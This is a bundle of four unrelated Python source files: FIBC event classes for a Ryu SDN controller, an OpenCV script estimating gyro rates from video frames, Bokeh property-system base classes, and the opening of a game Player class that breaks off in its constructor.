# Copyright (C) 2017 Nippon Telegraph and Telephone Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
FIBC Event
"""
from ryu.controller import event
from fabricflow.fibc.api import fibcapi_pb2 as pb
class EventFIBCBase(event.EventBase):
"""
FIBC Base event
"""
# pylint: disable=too-few-public-methods
def __init__(self, msg, mtype=pb.UNSPEC):
super(EventFIBCBase, self).__init__()
self.msg = msg
self.mtype = mtype
class EventFIBCPortConfig(EventFIBCBase):
"""
FIBC PortConfig event
msg: ryu,ofproto.OFPPort
"""
# pylint: disable=too-few-public-methods
pass
# pylint: disable=too-few-public-methods
class EventFIBCDpPortConfig(EventFIBCBase):
"""
FIBC DP PortConfig event.
msg: ryu,ofproto.OFPPort
"""
def __init__(self, msg, dp_id, port_id, enter, state):
super(EventFIBCDpPortConfig, self).__init__(msg)
self.dp_id = dp_id
self.port_id = port_id
self.enter = enter
self.state = state
class EventFIBCVsPortConfig(EventFIBCBase):
"""
FIBC VS PortConfig event
msg: ffpacket
"""
# pylint: disable=too-few-public-methods
def __init__(self, msg, vs_id, port_id):
super(EventFIBCVsPortConfig, self).__init__(msg)
self.vs_id = vs_id
self.port_id = port_id
class EventFIBCPortStatus(EventFIBCBase):
"""
FIBC VM PortConfig event
msg: pb.PortStatis
"""
# pylint: disable=too-few-public-methods
def __init__(self, msg):
super(EventFIBCPortStatus, self).__init__(msg, pb.PORT_STATUS)
class EventFIBCVmConfig(EventFIBCBase):
"""
FIBC VM Config event
msg; pb.Hello
"""
# pylint: disable=too-few-public-methods
def __init__(self, msg, enter):
super(EventFIBCVmConfig, self).__init__(msg, pb.HELLO)
self.enter = enter
class EventFIBCDpConfig(EventFIBCBase):
"""
FIBC Dp config event
msg: None
"""
# pylint: disable=too-few-public-methods
def __init__(self, msg, dp_id, enter):
super(EventFIBCDpConfig, self).__init__(msg)
self.dp_id = dp_id
self.enter = enter
class EventFIBCDpStatus(EventFIBCBase):
"""
FIBC Dp status event
msg: pb.DpStatus
"""
# pylint: disable=too-few-public-methods
def __init__(self, msg):
super(EventFIBCDpStatus, self).__init__(msg, pb.DP_STATUS)
class EventFIBCFFPortMod(EventFIBCBase):
"""
FIBC FFPortMod event
msg; pb.FFPortMod
"""
# pylint: disable=too-few-public-methods
def __init__(self, msg):
super(EventFIBCFFPortMod, self).__init__(msg, pb.FF_PORT_MOD)
class EventFIBCFlowMod(EventFIBCBase):
"""
FIBC FlowMod event
msg: pb.FlowMod
"""
# pylint: disable=too-few-public-methods
def __init__(self, msg):
super(EventFIBCFlowMod, self).__init__(msg, pb.FLOW_MOD)
class EventFIBCGroupMod(EventFIBCBase):
"""
FIBC GroupMod event
msg: pb.GroupMod
"""
# pylint: disable=too-few-public-methods
def __init__(self, msg):
super(EventFIBCGroupMod, self).__init__(msg, pb.GROUP_MOD)
class EventFIBCPortMap(EventFIBCBase):
"""
FIBC PortMap event
cmd: "ADD" "DELETE"
table: "dp"
msg: fibcdbm.create_dp()
table: "idmap"
msg: fibcdbm.create_idmap()
table: "port"
msg: fibcdbm.create_ports()
"""
# pylint: disable=too-few-public-methods
def __init__(self, msg, cmd, table):
super(EventFIBCPortMap, self).__init__(msg)
self.cmd = cmd
self.table = table
class EventFIBCEnterDP(EventFIBCBase):
"""
FIBC EnterDP event
msg: None
dp : FFDatapath
enter: True or False
ports: list of fibcapi.FFPort
"""
# pylint: disable=too-few-public-methods
def __init__(self, dpath, enter, ports):
super(EventFIBCEnterDP, self).__init__(None)
self.dp = dpath # pylint: disable=invalid-name
self.enter = enter
self.ports = ports
class EventFIBCFFPortStatus(EventFIBCBase):
"""
FIBC FFPortStatus event
msg: lib.fibcryu.FFPortStatus
"""
# pylint: disable=too-few-public-methods
pass
class EventFIBCMultipartRequest(EventFIBCBase):
"""
FIBC FFMultipart Request event
msg: pb.FFMultipart.Request
dpath: FFDatapath
"""
# pylint: disable=too-few-public-methods
def __init__(self, dpath, msg):
super(EventFIBCMultipartRequest, self).__init__(msg. pb.FF_MULTIPART_REQUEST)
self.dp = dpath # pylint: disable=invalid-name
class EventFIBCMultipartReply(EventFIBCBase):
"""
FIBC FFMultipart Reply event
msg: pb.FFMultipart.Reply
dpath: FFDatapath
"""
# pylint: disable=too-few-public-methods
def __init__(self, dpath, msg, xid=0):
super(EventFIBCMultipartReply, self).__init__(msg, pb.FF_MULTIPART_REPLY)
self.dp = dpath # pylint: disable=invalid-name
self.xid = xid
class EventFIBCPacketIn(EventFIBCBase):
"""
FIBC FFPacketIn event
msg: pb.FFPacketIn
dpath: FFDatapath
"""
def __init__(self, dpath, msg, xid=0):
super(EventFIBCPacketIn, self).__init__(msg, pb.FF_PACKET_IN)
self.dp = dpath # pylint: disable=invalid-name
self.xid = xid
class EventFIBCPacketOut(EventFIBCBase):
"""
FIBC FFPacketOut event
msg: pb.FFPacketOut
dpath: FFDatapath
"""
def __init__(self, dpath, msg, xid=0):
super(EventFIBCPacketOut, self).__init__(msg, pb.FF_PACKET_OUT)
self.datapath = dpath
self.xid = xid
class EventFIBCL2AddrStatus(EventFIBCBase):
"""
FIBC L2AddrStatus event
msg: pb.L2AddrStatus
dpath: FFDatapath
"""
def __init__(self, msg):
super(EventFIBCL2AddrStatus, self).__init__(msg, pb.L2ADDR_STATUS)
class EventFIBCFFL2AddrStatus(EventFIBCBase):
"""
FIBC FFL2AddrStatus event
msg: pb.FFL2AddrStatus
dpath: FFDatapath
"""
def __init__(self, dpath, msg, xid=0):
super(EventFIBCFFL2AddrStatus, self).__init__(msg, pb.FF_L2ADDR_STATUS)
self.datapath = dpath
self.xid = xid
| |
#!/usr/bin/env python3
import argparse
import csv
import cv2
import skvideo.io # pip3 install sk-video
import json
import math
import numpy as np
import os
from tqdm import tqdm
from props import PropertyNode
import props_json
import sys
sys.path.append('../scripts')
from lib import transformations
import camera
# constants
d2r = math.pi / 180.0
r2d = 180.0 / math.pi
match_ratio = 0.75
max_features = 500
catchup = 0.02
affine_minpts = 7
tol = 1.0
parser = argparse.ArgumentParser(description='Estimate gyro biases from movie.')
parser.add_argument('video', help='video file')
parser.add_argument('--camera', help='select camera calibration file')
parser.add_argument('--scale', type=float, default=1.0, help='scale input')
parser.add_argument('--skip-frames', type=int, default=0, help='skip n initial frames')
parser.add_argument('--no-equalize', action='store_true', help='disable image equalization')
parser.add_argument('--write', action='store_true', help='write out video with keypoints shown')
args = parser.parse_args()
#file = args.video
scale = args.scale
skip_frames = args.skip_frames
# pathname work
abspath = os.path.abspath(args.video)
filename, ext = os.path.splitext(abspath)
dirname = os.path.dirname(args.video)
output_csv = filename + "_rates.csv"
output_video = filename + "_keypts.mp4"
local_config = os.path.join(dirname, "camera.json")
camera = camera.VirtualCamera()
camera.load(args.camera, local_config, args.scale)
K = camera.get_K()
IK = camera.get_IK()
dist = camera.get_dist()
print('Camera:', camera.get_name())
print('K:\n', K)
print('IK:\n', IK)
print('dist:', dist)
cu = K[0,2]
cv = K[1,2]
metadata = skvideo.io.ffprobe(args.video)
#print(metadata.keys())
print(json.dumps(metadata["video"], indent=4))
fps_string = metadata['video']['@avg_frame_rate']
(num, den) = fps_string.split('/')
fps = float(num) / float(den)
codec = metadata['video']['@codec_long_name']
w = int(round(int(metadata['video']['@width']) * scale))
h = int(round(int(metadata['video']['@height']) * scale))
total_frames = int(round(float(metadata['video']['@duration']) * fps))
print('fps:', fps)
print('codec:', codec)
print('output size:', w, 'x', h)
print('total frames:', total_frames)
print("Opening ", args.video)
reader = skvideo.io.FFmpegReader(args.video, inputdict={}, outputdict={})
if args.write:
inputdict = {
'-r': str(fps)
}
lossless = {
# See all options: https://trac.ffmpeg.org/wiki/Encode/H.264
'-vcodec': 'libx264', # use the h.264 codec
'-crf': '0', # set the constant rate factor to 0, (lossless)
'-preset': 'veryslow', # maximum compression
'-r': str(fps) # match input fps
}
sane = {
# See all options: https://trac.ffmpeg.org/wiki/Encode/H.264
'-vcodec': 'libx264', # use the h.264 codec
'-crf': '17', # visually lossless (or nearly so)
'-preset': 'medium', # default compression
'-r': str(fps) # match input fps
}
video_writer = skvideo.io.FFmpegWriter(output_video, inputdict=inputdict, outputdict=sane)
# find affine transform between matching keypoints in pixel
# coordinate space. fullAffine=True means unconstrained to
# include best warp/shear. fullAffine=False means limit the
# matrix to only best rotation, translation, and scale.
def findAffine(src, dst, fullAffine=False):
#print("src:", src)
#print("dst:", dst)
if len(src) >= affine_minpts:
# affine = cv2.estimateRigidTransform(np.array([src]), np.array([dst]), fullAffine)
affine, status = \
cv2.estimateAffinePartial2D(np.array([src]).astype(np.float32),
np.array([dst]).astype(np.float32))
else:
affine = None
status = None
print("num pts:", len(src), "used:", np.count_nonzero(status), "affine:\n", affine)
#print str(affine)
return affine, status
def decomposeAffine(affine):
if affine is None:
print("HEY: we should never see affine=None here!")
return (0.0, 0.0, 0.0, 1.0, 1.0)
tx = affine[0][2]
ty = affine[1][2]
a = affine[0][0]
b = affine[0][1]
c = affine[1][0]
d = affine[1][1]
sx = math.sqrt( a*a + b*b )
if a < 0.0:
sx = -sx
sy = math.sqrt( c*c + d*d )
if d < 0.0:
sy = -sy
rotate_rad = math.atan2(-b,a)
if rotate_rad < -math.pi:
rotate_rad += 2*math.pi
if rotate_rad > math.pi:
rotate_rad -= 2*math.pi
return (rotate_rad, tx, ty, sx, sy)
def filterMatches(kp1, kp2, matches):
mkp1, mkp2 = [], []
idx_pairs = []
used = np.zeros(len(kp2), np.bool_)
for m in matches:
if len(m) == 2 and m[0].distance < m[1].distance * match_ratio:
#print " dist[0] = %d dist[1] = %d" % (m[0].distance, m[1].distance)
m = m[0]
# FIXME: ignore the bottom section of movie for feature detection
#if kp1[m.queryIdx].pt[1] > h*0.75:
# continue
if not used[m.trainIdx]:
used[m.trainIdx] = True
mkp1.append( kp1[m.queryIdx] )
mkp2.append( kp2[m.trainIdx] )
idx_pairs.append( (m.queryIdx, m.trainIdx) )
p1 = np.float32([kp.pt for kp in mkp1])
p2 = np.float32([kp.pt for kp in mkp2])
kp_pairs = zip(mkp1, mkp2)
return p1, p2, kp_pairs, idx_pairs
def filterFeatures(p1, p2, K, method):
inliers = 0
total = len(p1)
space = ""
status = []
M = None
if len(p1) < 7:
# not enough points
return None, np.zeros(total), [], []
if method == 'homography':
M, status = cv2.findHomography(p1, p2, cv2.RANSAC, tol)
elif method == 'fundamental':
M, status = cv2.findFundamentalMat(p1, p2, cv2.RANSAC, tol)
elif method == 'essential':
M, status = cv2.findEssentialMat(p1, p2, K, cv2.LMEDS, prob=0.99999, threshold=tol)
elif method == 'none':
M = None
status = np.ones(total)
newp1 = []
newp2 = []
for i, flag in enumerate(status):
if flag:
newp1.append(p1[i])
newp2.append(p2[i])
inliers = np.sum(status)
total = len(status)
#print('%s%d / %d inliers/matched' % (space, np.sum(status), len(status)))
return M, status, np.float32(newp1), np.float32(newp2)
# track persistant edges and create a mask from them (useful when
# portions of our own airframe are visible in the video)
edges_accum = None
edges_counter = 1
edge_filt_time = 15 # sec
kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (9, 9))
def make_edge_mask(gray):
global edges_accum
global edges_counter
avail_sec = edges_counter / fps
secs = np.min([avail_sec, 15])
edge_filt_frames = secs * fps
weight_a = (edge_filt_frames - 1) / edge_filt_frames
weight_b = 1 / edge_filt_frames
print("weights:", edges_counter, secs, edge_filt_frames, weight_a, weight_b)
edges = cv2.Canny(gray, 50, 150)
print("edges:", np.count_nonzero(edges))
cv2.imshow("edges", edges)
if edges_accum is None:
edges_accum = edges.astype(np.float32)
else:
edges_accum = weight_a * edges_accum + weight_b * edges.astype(np.float32)
cv2.imshow("edges filter", edges_accum.astype('uint8'))
max = np.max(edges_accum)
thresh = int(round(max * 0.4))
print("max edges:", (edges_accum >= thresh).sum())
ratio = (edges_accum >= thresh).sum() / (edges_accum.shape[0]*edges_accum.shape[1])
print("ratio:", ratio)
if ratio < 0.01:
ret2, thresh1 = cv2.threshold(edges_accum.astype('uint8'), thresh, 255, cv2.THRESH_BINARY)
thresh1 = cv2.dilate(thresh1, kernel, iterations=2)
else:
thresh1 = edges_accum * 0
cv2.imshow('edge thresh1', thresh1)
edges_counter += 1
return thresh1
# only pass through keypoints if they aren't masked by the mask image
def apply_edge_mask(mask, kp_list):
new_list = []
for kp in kp_list:
if mask[int(round(kp.pt[1])), int(round(kp.pt[0]))] == 0:
new_list.append(kp)
return new_list
if True:
# for ORB
detector = cv2.ORB_create(max_features)
extractor = detector
norm = cv2.NORM_HAMMING
matcher = cv2.BFMatcher(norm)
else:
# for SIFT
max_features = 200
detector = cv2.SIFT_create(nfeatures=max_features, nOctaveLayers=5)
extractor = detector
norm = cv2.NORM_L2
FLANN_INDEX_KDTREE = 1 # bug: flann enums are missing
FLANN_INDEX_LSH = 6
flann_params = { 'algorithm': FLANN_INDEX_KDTREE,
'trees': 5 }
matcher = cv2.FlannBasedMatcher(flann_params, {}) # bug : need to pass empty dict (#1329)
accum = None
kp_list_last = []
des_list_last = []
p1 = []
p2 = []
counter = -1
rot_last = 0
tx_last = 0
ty_last = 0
if not args.no_equalize:
clahe = cv2.createCLAHE(clipLimit=3.0, tileGridSize=(8,8))
csvfile = open(output_csv, 'w')
fieldnames=[ 'frame', 'video time',
'p (rad/sec)', 'q (rad/sec)', 'r (rad/sec)',
'hp (rad/sec)', 'hq (rad/sec)', 'hr (rad/sec)' ]
writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
writer.writeheader()
hp = 0
hq = 0
hr = 0
pbar = tqdm(total=int(total_frames), smoothing=0.05)
for frame in reader.nextFrame():
frame = frame[:,:,::-1] # convert from RGB to BGR (to make opencv happy)
counter += 1
if counter < skip_frames:
if counter % 100 == 0:
print("Skipping %d frames..." % counter)
else:
continue
# print "Frame %d" % counter
method = cv2.INTER_AREA
#method = cv2.INTER_LANCZOS4
frame_scale = cv2.resize(frame, (0,0), fx=scale, fy=scale,
interpolation=method)
cv2.imshow('scaled orig', frame_scale)
shape = frame_scale.shape
tol = shape[1] / 200.0
if tol < 1.0: tol = 1.0
frame_undist = cv2.undistort(frame_scale, K, np.array(dist))
gray = cv2.cvtColor(frame_undist, cv2.COLOR_BGR2GRAY)
if not args.no_equalize:
gray = clahe.apply(gray)
cv2.imshow("gray equalized", gray)
edge_mask = make_edge_mask(gray)
kp_list = detector.detect(gray)
kp_list = apply_edge_mask(edge_mask, kp_list)
kp_list, des_list = extractor.compute(gray, kp_list)
# Fixme: make a command line option
# possible values are "homography", "fundamental", "essential", "none"
filter_method = "homography"
if des_list_last is None or des_list is None or len(des_list_last) == 0 or len(des_list) == 0:
kp_list_last = kp_list
des_list_last = des_list
continue
#print(len(des_list_last), len(des_list))
matches = matcher.knnMatch(des_list, trainDescriptors=des_list_last, k=2)
p1, p2, kp_pairs, idx_pairs = filterMatches(kp_list, kp_list_last, matches)
kp_list_last = kp_list
des_list_last = des_list
M, status, newp1, newp2 = filterFeatures(p1, p2, K, filter_method)
if len(newp1) < 1:
continue
affine, aff_status = findAffine(newp2 - np.array([cu,cv]),
newp1 - np.array([cu,cv]),
fullAffine=False)
if affine is None:
continue
(rot, tx, ty, sx, sy) = decomposeAffine(affine)
if abs(rot) > 0.1 or math.sqrt(tx*tx+ty*ty) > 20:
print("sanity limit:", rot, tx, ty)
(rot, tx, ty, sx, sy) = (0.0, 0.0, 0.0, 1.0, 1.0)
#print affine
print("affine:", rot, tx, ty)
translate_only = False
rotate_translate_only = True
if translate_only:
rot = 0.0
sx = 1.0
sy = 1.0
elif rotate_translate_only:
sx = 1.0
sy = 1.0
# roll rate from affine rotation
p = -rot * fps
# pitch and yaw rates from affine translation projected through
# camera calibration
# as an approximation, for estimating angle from translation, use
# a point a distance away from center that matches the average
# feature distance from center.
diff = newp1 - np.array([cu, cv])
xoff = np.mean(np.abs(diff[:,0]))
yoff = np.mean(np.abs(diff[:,1]))
print("avg xoff: %.2f" % xoff, "avg yoff: %.2f" % yoff)
#print(cu, cv)
#print("IK:", IK)
uv0 = np.array([cu+xoff, cv+yoff, 1.0])
uv1 = np.array([cu+xoff-tx, cv+yoff, 1.0])
uv2 = np.array([cu+xoff, cv+yoff+ty, 1.0])
proj0 = IK.dot(uv0)
proj1 = IK.dot(uv1)
proj2 = IK.dot(uv2)
#print(proj1, proj2)
dp1 = np.dot(proj0/np.linalg.norm(proj0), proj1/np.linalg.norm(proj1))
dp2 = np.dot(proj0/np.linalg.norm(proj0), proj2/np.linalg.norm(proj2))
if dp1 > 1:
print("dp1 limit")
dp1 = 1
if dp2 > 1:
print("dp2 limit")
dp2 = 1
#print("dp:", dp1, dp2)
if uv1[0] < cu+xoff:
r = -np.arccos(dp1) * fps
else:
r = np.arccos(dp1) * fps
if uv2[1] < cv+yoff:
q = -np.arccos(dp2) * fps
else:
q = np.arccos(dp2) * fps
print("A ypr: %.2f %.2f %.2f" % (r, q, p))
# alternative method for determining pose change from previous frame
if filter_method == "homography" and not M is None:
print("M:\n", M)
(result, Rs, tvecs, norms) = cv2.decomposeHomographyMat(M, K)
possible = cv2.filterHomographyDecompByVisibleRefpoints(Rs, norms, np.array([newp1]), np.array([newp2]))
#print("R:", Rs)
print("Num:", len(Rs), "poss:", possible)
best = 100000
best_index = None
best_val = None
for i, R in enumerate(Rs):
(Hpsi, Hthe, Hphi) = transformations.euler_from_matrix(R, 'rzyx')
hp = Hpsi * fps
hq = Hphi * fps
hr = Hthe * fps
d = np.linalg.norm( np.array([p, q, r]) - np.array([hp, hq, hr]) )
if d < best:
best = d
best_index = i
best_val = [hp, hq, hr]
print(" H ypr: %.2f %.2f %.2f" % (hp, hq, hr))
(hp, hq, hr) = best_val
print("R:\n", Rs[best_index])
print("H ypr: %.2f %.2f %.2f" % (hp, hq, hr))
elif filter_method == "essential" and not M is None:
#print("M:", M)
R1, R2, t = cv2.decomposeEssentialMat(M)
#print("R1:\n", R1)
#print("R2:\n", R2)
(psi1, the1, phi1) = transformations.euler_from_matrix(R1, 'rzyx')
(psi2, the2, phi2) = transformations.euler_from_matrix(R2, 'rzyx')
#print("ypr1: %.2f %.2f %.2f" % (psi1*r2d, the1*r2d, phi1*r2d))
#print("ypr2: %.2f %.2f %.2f" % (psi2*r2d, the2*r2d, phi2*r2d))
# we are expecting very small pose changes
norm1 = np.linalg.norm( [psi1, the1, phi1] )
norm2 = np.linalg.norm( [psi2, the2, phi2] )
if norm1 < norm2:
Epsi = psi1; Ethe = the1; Ephi = phi1
else:
Epsi = psi2; Ethe = the2; Ephi = phi2
if norm1 > 0.1 and norm2 > 0.1:
print("NOISE:")
print("M:\n", M)
print("t:\n", t)
print("R1:\n", R1)
print("R2:\n", R2)
print("ypr1: %.2f %.2f %.2f" % (psi1*r2d, the1*r2d, phi1*r2d))
print("ypr2: %.2f %.2f %.2f" % (psi2*r2d, the2*r2d, phi2*r2d))
cv2.waitKey()
print("Eypr: %.2f %.2f %.2f" % (Epsi, Ethe, Ephi))
# we can attempt to extract frame rotation from the
# essential matrix (but this seems currently very noisy or
# something is wrong in my assumptions or usage.)
#(n, R, tvec, mask) = cv2.recoverPose(E=M,
# points1=p1, points2=p2,
# cameraMatrix=K)
#print("R:", R)
#(yaw, pitch, roll) = transformations.euler_from_matrix(R, 'rzyx')
#print("ypr: %.2f %.2f %.2f" % (yaw*r2d, pitch*r2d, roll*r2d))
# divide tx, ty by args.scale to get a translation value
# relative to the original movie size.
row = { 'frame': counter,
'video time': "%.4f" % (counter / fps),
'p (rad/sec)': "%.4f" % p,
'q (rad/sec)': "%.4f" % q,
'r (rad/sec)': "%.4f" % r,
'hp (rad/sec)': "%.4f" % hp,
'hq (rad/sec)': "%.4f" % hq,
'hr (rad/sec)': "%.4f" % hr
}
#print(row)
writer.writerow(row)
#print("affine motion: %d %.2f %.1f %.1f" % (counter, rot, tx, ty))
#print("est gyro: %d %.3f %.3f %.3f" % (counter, p, q, r))
if True:
ah = np.vstack([affine, [0, 0, 1]])
print("ah:\n", ah)
h, w = frame_undist.shape[:2]
print(frame_undist.shape)
pts = []
for x in np.linspace(0, w, num=11, endpoint=True):
for y in np.linspace(0, h, num=11, endpoint=True):
pts.append( [x, y] )
pts1 = np.array([pts])
#newpts = pts.dot(M.T)
print(pts1.shape)
Mi = np.linalg.inv(M)
newpts = cv2.perspectiveTransform(pts1, Mi)
print(newpts.shape)
for i in range(len(pts)):
p1 = pts[i]
p2 = newpts[0][i]
cv2.line(frame_undist,
(int(round(p1[0])), int(round(p1[1]))),
(int(round(p2[0])), int(round(p2[1]))),
(0,255,0), 1, cv2.LINE_AA)
for pt in newp1:
cv2.circle(frame_undist, (int(pt[0]), int(pt[1])), 2, (64,212,64), 1, cv2.LINE_AA)
if False:
for i in range(newp1.shape[0]):
p1 = newp1[i]
p2 = newp2[i]
cv2.line(frame_undist,
(int(round(p1[0])), int(round(p1[1]))),
(int(round(p2[0])), int(round(p2[1]))),
(0,255,0), 1, cv2.LINE_AA)
if False:
for pt in newp1:
cv2.circle(frame_undist, (int(pt[0]), int(pt[1])), 3, (0,255,0), 1, cv2.LINE_AA)
for pt in newp2:
cv2.circle(frame_undist, (int(pt[0]), int(pt[1])), 2, (0,0,255), 1, cv2.LINE_AA)
if False:
diff = newp1 - newp2
x = newp1[:,0] # dist from center
y = diff[:,0] # u difference
#print(diff[:,0])
fit, res, _, _, _ = np.polyfit( x, y, 2, full=True )
print(fit)
func = np.poly1d(fit)
print("val at cu:", func(cu))
cv2.imshow('bgr', frame_undist)
if args.write:
video_writer.writeFrame(frame_undist[:,:,::-1])
if 0xFF & cv2.waitKey(5) == 27:
break
pbar.update(1)
pbar.close()
cv2.destroyAllWindows()
| |
''' Provide base classes for the Bokeh property system.
.. note::
These classes form part of the very low-level machinery that implements
the Bokeh model and property system. It is unlikely that any of these
classes or their methods will be applicable to any standard usage or to
anyone who is not directly developing on Bokeh's own infrastructure.
'''
from __future__ import absolute_import
import logging
logger = logging.getLogger(__name__)
from copy import copy
import types
from six import string_types
from ...util.string import nice_join
from .containers import PropertyValueList, PropertyValueDict
from .descriptor_factory import PropertyDescriptorFactory
from .descriptors import BasicPropertyDescriptor
class DeserializationError(Exception):
pass
class Property(PropertyDescriptorFactory):
''' Base class for Bokeh property instances, which can be added to Bokeh
Models.
Args:
default (obj or None, optional) :
A default value for attributes created from this property to
have (default: None)
help (str or None, optional) :
A documentation string for this property. It will be automatically
used by the :ref:`bokeh.sphinxext.bokeh_prop` extension when
generating Spinx documentation. (default: None)
serialized (bool, optional) :
Whether attributes created from this property should be included
in serialization (default: True)
readonly (bool, optional) :
Whether attributes created from this property are read-only.
(default: False)
'''
def __init__(self, default=None, help=None, serialized=True, readonly=False):
# This is how the descriptor is created in the class declaration.
self._serialized = False if readonly else serialized
self._readonly = readonly
self._default = default
self.__doc__ = help
self.alternatives = []
self.assertions = []
# "fail early" when a default is invalid
self.validate(self._raw_default())
def __str__(self):
return self.__class__.__name__
@classmethod
def _sphinx_prop_link(cls):
''' Generate a sphinx :class: link to this property.
'''
return ":class:`~bokeh.core.properties.%s` " % cls.__name__
@staticmethod
def _sphinx_model_link(name):
''' Generate a sphinx :class: link to given named model.
'''
return ":class:`~%s` " % name
def _sphinx_type(self):
''' Generate a Sphinx-style reference to this type for documentation
automation purposes.
'''
return self._sphinx_prop_link()
def make_descriptors(self, base_name):
''' Return a list of ``BasicPropertyDescriptor`` instances to install
on a class, in order to delegate attribute access to this property.
Args:
name (str) : the name of the property these descriptors are for
Returns:
list[BasicPropertyDescriptor]
The descriptors returned are collected by the ``MetaHasProps``
metaclass and added to ``HasProps`` subclasses during class creation.
'''
return [ BasicPropertyDescriptor(base_name, self) ]
def _may_have_unstable_default(self):
''' False if we have a default that is immutable, and will be the
same every time (some defaults are generated on demand by a function
to be called).
'''
return isinstance(self._default, types.FunctionType)
@classmethod
def _copy_default(cls, default):
''' Return a copy of the default, or a new value if the default
is specified by a function.
'''
if not isinstance(default, types.FunctionType):
return copy(default)
else:
return default()
def _raw_default(self):
''' Return the untransformed default value.
The raw_default() needs to be validated and transformed by
prepare_value() before use, and may also be replaced later by
subclass overrides or by themes.
'''
return self._copy_default(self._default)
def themed_default(self, cls, name, theme_overrides):
''' The default, transformed by prepare_value() and the theme overrides.
'''
overrides = theme_overrides
if overrides is None or name not in overrides:
overrides = cls._overridden_defaults()
if name in overrides:
default = self._copy_default(overrides[name])
else:
default = self._raw_default()
return self.prepare_value(cls, name, default)
@property
def serialized(self):
''' Whether the property should be serialized when serializing an object.
This would be False for a "virtual" or "convenience" property that duplicates
information already available in other properties, for example.
'''
return self._serialized
@property
def readonly(self):
''' Whether this property is read-only.
Read-only properties may only be modified by the client (i.e., by BokehJS
in the browser).
'''
return self._readonly
def matches(self, new, old):
# XXX: originally this code warned about not being able to compare values, but that
# doesn't make sense, because most comparisons involving numpy arrays will fail with
# ValueError exception, thus warning about inevitable.
try:
if new is None or old is None:
return new is old # XXX: silence FutureWarning from NumPy
else:
return new == old
except (KeyboardInterrupt, SystemExit):
raise
except Exception:
# if we cannot compare (e.g. arrays) just punt return False for match
pass
return False
def from_json(self, json, models=None):
''' Convert from JSON-compatible values into a value for this property.
JSON-compatible values are: list, dict, number, string, bool, None
'''
return json
def serialize_value(self, value):
''' Change the value into a JSON serializable format.
'''
return value
def transform(self, value):
''' Change the value into the canonical format for this property.
Args:
value (obj) : the value to apply transformation to.
Returns:
obj: transformed value
'''
return value
def validate(self, value):
''' Determine whether we can set this property from this value.
Validation happens before transform()
Args:
value (obj) : the value to validate against this property type
Returns:
None
Raises:
ValueError if the value is not valid for this property type
'''
pass
def is_valid(self, value):
''' Whether the value passes validation
Args:
value (obj) : the value to validate against this property type
Returns:
True if valid, False otherwise
'''
try:
self.validate(value)
except ValueError:
return False
else:
return True
@classmethod
def _wrap_container(cls, value):
if isinstance(value, list):
if isinstance(value, PropertyValueList):
return value
else:
return PropertyValueList(value)
elif isinstance(value, dict):
if isinstance(value, PropertyValueDict):
return value
else:
return PropertyValueDict(value)
else:
return value
def prepare_value(self, obj_or_cls, name, value):
try:
self.validate(value)
except ValueError as e:
for tp, converter in self.alternatives:
if tp.is_valid(value):
value = converter(value)
break
else:
raise e
else:
value = self.transform(value)
from ..has_props import HasProps
if isinstance(obj_or_cls, HasProps):
obj = obj_or_cls
for fn, msg_or_fn in self.assertions:
if isinstance(fn, bool):
result = fn
else:
result = fn(obj, value)
assert isinstance(result, bool)
if not result:
if isinstance(msg_or_fn, string_types):
raise ValueError(msg_or_fn)
else:
msg_or_fn(obj, name, value)
return self._wrap_container(value)
@property
def has_ref(self):
return False
def accepts(self, tp, converter):
''' Declare that other types may be converted to this property type.
Args:
tp (Property) :
A type that may be converted automatically to this property
type.
converter (callable) :
A function accepting ``value`` to perform conversion of the
value to this property type.
Returns:
self
'''
tp = ParameterizedProperty._validate_type_param(tp)
self.alternatives.append((tp, converter))
return self
def asserts(self, fn, msg_or_fn):
''' Assert that prepared values satisfy given conditions.
Assertions are intended in enforce conditions beyond simple value
type validation. For instance, this method can be use to assert that
the columns of a ``ColumnDataSource`` all collectively have the same
length at all times.
Args:
fn (callable) :
A function accepting ``(obj, value)`` that returns True if the value
passes the assertion, or False othwise
msg_or_fn (str or callable) :
A message to print in case the assertion fails, or a function
accepting ``(obj, name, value)`` to call in in case the assertion
fails.
Returns:
self
'''
self.assertions.append((fn, msg_or_fn))
return self
class ParameterizedProperty(Property):
''' A base class for Properties that have type parameters, e.g.
``List(String)``.
'''
@staticmethod
def _validate_type_param(type_param):
if isinstance(type_param, type):
if issubclass(type_param, Property):
return type_param()
else:
type_param = type_param.__name__
elif isinstance(type_param, Property):
return type_param
raise ValueError("expected a Propertyas type parameter, got %s" % type_param)
@property
def type_params(self):
raise NotImplementedError("abstract method")
@property
def has_ref(self):
return any(type_param.has_ref for type_param in self.type_params)
class PrimitiveProperty(Property):
''' A base class for simple property types.
Subclasses should define a class attribute ``_underlying_type`` that is
a tuple of acceptable type values for the property.
Example:
A trivial version of a ``Float`` property might look like:
.. code-block:: python
class Float(PrimitiveProperty):
_underlying_type = (numbers.Real,)
'''
_underlying_type = None
def validate(self, value):
super(PrimitiveProperty, self).validate(value)
if not (value is None or isinstance(value, self._underlying_type)):
raise ValueError("expected a value of type %s, got %s of type %s" %
(nice_join([ cls.__name__ for cls in self._underlying_type ]), value, type(value).__name__))
def from_json(self, json, models=None):
if json is None or isinstance(json, self._underlying_type):
return json
else:
expected = nice_join([ cls.__name__ for cls in self._underlying_type ])
raise DeserializationError("%s expected %s, got %s" % (self, expected, json))
def _sphinx_type(self):
return self._sphinx_prop_link()
class ContainerProperty(ParameterizedProperty):
''' A base class for Container-like type properties.
'''
def _may_have_unstable_default(self):
# all containers are mutable, so the default can be modified
return True
| |
"""
player.py
Contains the definition of the Player class.
Written by: Mohsin Rizvi
Last edited: 09/28/17
"""
import ability
import item
import bio
import zone
import random
import damage
# The Player character.
class Player:
# Purpose: Constructor for the Player class.
# Parameters: A name for the Player, which defaults to "Hero", a character
# profession (class), and the character's race (human, alien,
# etc.
# Return: Void
def __init__(self, myName, myRace, myProf):
self.name = myName
self.race = myRace
self.prof = myProf
self.biography = bio.Bio(self.race)
# Initialize and assign player stats and XP.
self.assignStats()
self.xp = 0
self.lvl = 1
# Generate a world map.
self.map = zone.WorldMap()
# Initialize inventory slots and abilities.
self.gold = 10
self.inv = []
self.abilities = []
